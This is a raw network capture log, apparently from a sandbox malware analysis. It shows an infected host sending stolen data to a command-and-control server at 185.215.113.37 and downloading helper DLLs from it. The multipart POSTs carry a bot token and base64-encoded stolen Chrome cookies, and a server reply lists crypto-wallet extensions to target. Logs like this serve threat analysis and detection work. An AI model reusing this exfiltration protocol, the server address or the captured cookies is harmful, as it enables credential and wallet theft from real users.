0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="message"fplugins------AEBAFBGIDHCBFHIECFCB--
Sep 26, 2024 11:33:25.200521946 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:25 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 26, 2024 11:33:25.227961063 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIE Host: 185.215.113.37 Content-Length: 7815 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 11:33:25.228039980 CEST	7815	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 Data Ascii: ------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 26, 2024 11:33:25.978530884 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:26.238163948 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:26.455903053 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:26 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 26, 2024 11:33:26.455965996 CEST	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 26, 2024 11:33:26.455977917 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 26, 2024 11:33:26.455991030 CEST	1236	IN	Data Raw: ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 51 f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 2a f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc ff ff 83 ec 0c e9 d9 fe ff ff 89 7c 24 08 c7 44 24 Data Ascii: \|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=xgat9$pa\|aQtD$pa$aRR
Sep 26, 2024 11:33:27.855798006 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlFyZWlHS2UxYUROODNNZXZlRDdQTDFSWlh2YTRzLW5GYzl3YVFpOUx0S2F2dVRJYmE4TVVrb0d1NThFOEU4MWd3Ql9UV0o0TmctTGZDdnpoZW03ck5yaFpRMmFHdkpaOWcyVFlocXgyVzJPNEU3dUhRelBrM3Z1THZNTHhGWFpzcUU2TmRBVmlRREVDR3BvCg==------GDHDHJEBGHJKFIECBGCB--
Sep 26, 2024 11:33:28.153147936 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlFyZWlHS2UxYUROODNNZXZlRDdQTDFSWlh2YTRzLW5GYzl3YVFpOUx0S2F2dVRJYmE4TVVrb0d1NThFOEU4MWd3Ql9UV0o0TmctTGZDdnpoZW03ck5yaFpRMmFHdkpaOWcyVFlocXgyVzJPNEU3dUhRelBrM3Z1THZNTHhGWFpzcUU2TmRBVmlRREVDR3BvCg==------GDHDHJEBGHJKFIECBGCB--
Sep 26, 2024 11:33:28.762512922 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlFyZWlHS2UxYUROODNNZXZlRDdQTDFSWlh2YTRzLW5GYzl3YVFpOUx0S2F2dVRJYmE4TVVrb0d1NThFOEU4MWd3Ql9UV0o0TmctTGZDdnpoZW03ck5yaFpRMmFHdkpaOWcyVFlocXgyVzJPNEU3dUhRelBrM3Z1THZNTHhGWFpzcUU2TmRBVmlRREVDR3BvCg==------GDHDHJEBGHJKFIECBGCB--
Sep 26, 2024 11:33:29.525377989 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:28 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:29.607295036 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBGHCGCAEBFIJKFIDBGHContent-Disposition: form-data; name="file"------FBGHCGCAEBFIJKFIDBGH--
Sep 26, 2024 11:33:30.339371920 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:29 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:31.105992079 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 62 35 33 36 30 35 30 38 31 37 31 62 35 65 33 62 38 34 38 64 37 62 37 38 31 38 66 63 64 62 35 61 30 32 64 65 34 30 33 30 64 65 39 37 36 63 33 33 61 64 35 66 65 61 32 63 35 35 61 31 62 39 64 64 64 35 31 38 62 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"25b5360508171b5e3b848d7b7818fcdb5a02de4030de976c33ad5fea2c55a1b9ddd518b7------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="file"------DBFBFBGDBKJJKFIEHJDB--
Sep 26, 2024 11:33:31.823221922 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:31 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 11:33:32.213787079 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:32.431807041 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:32 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 26, 2024 11:33:33.235352993 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:33.453360081 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:33 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 26, 2024 11:33:33.929358006 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:34.146826029 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:34 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 26, 2024 11:33:34.456351042 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 26, 2024 11:33:34.673866034 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 09:33:34 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text 